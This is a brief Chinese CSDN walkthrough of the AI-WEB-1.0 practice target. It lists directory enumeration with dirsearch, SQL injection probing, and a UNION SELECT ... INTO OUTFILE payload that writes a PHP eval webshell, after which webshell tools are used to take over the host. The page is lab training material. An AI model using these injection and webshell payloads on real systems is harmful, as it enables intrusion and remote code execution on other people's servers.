CSDN AI-WEB-1.0 攻略

找到一个目标靶场的IP , 这里以172.16.1.98 为例

1、使用命令 /robots.txt 来确定目录

2、分别测试两个文件

均无法访问,可返回其根目录查询

3、到根目录,出现搜索框

4、输入ID为1

5、使用虚拟机kali的终端

搜索命令 dirsearch -u http://172.16.1.98/m3diNf0/

6、搜索文件 info.php

即可得到 WWW 所在的根目录

7、确定闭合方式 1'

8、确定字段

1' order by 3#

9、注入一句话"木马"

1' union select 1,2 ,'<?php @eval($_POST['cmd']);?>' into outfile '绝对路径' #

9、查看文件,木马是否注入成功

搜索 /s /up /sis.php

10、使用中国蚁键/中国菜刀等工具,进入该系统

++即可成功获取信息++

安全

网络安全人人有责,切勿知法犯法

相关推荐
qq_589568107 分钟前
Echarts的高级使用,动画,交互api
前端·javascript·echarts
鸭梨山大。30 分钟前
Jenkins 任意文件读取(CVE-2024-23897)修复及复现
安全·中间件·jenkins
小蜗牛慢慢爬行34 分钟前
如何在 Spring Boot 微服务中设置和管理多个数据库
java·数据库·spring boot·后端·微服务·架构·hibernate
hanbarger37 分钟前
nosql,Redis,minio,elasticsearch
数据库·redis·nosql
网安墨雨44 分钟前
常用网络协议
网络·网络协议
Tlzns1 小时前
Linux网络——UDP的运用
linux·网络·udp
微服务 spring cloud1 小时前
配置PostgreSQL用于集成测试的步骤
数据库·postgresql·集成测试
先睡1 小时前
MySQL的架构设计和设计模式
数据库·mysql·设计模式
弗罗里达老大爷1 小时前
Redis
数据库·redis·缓存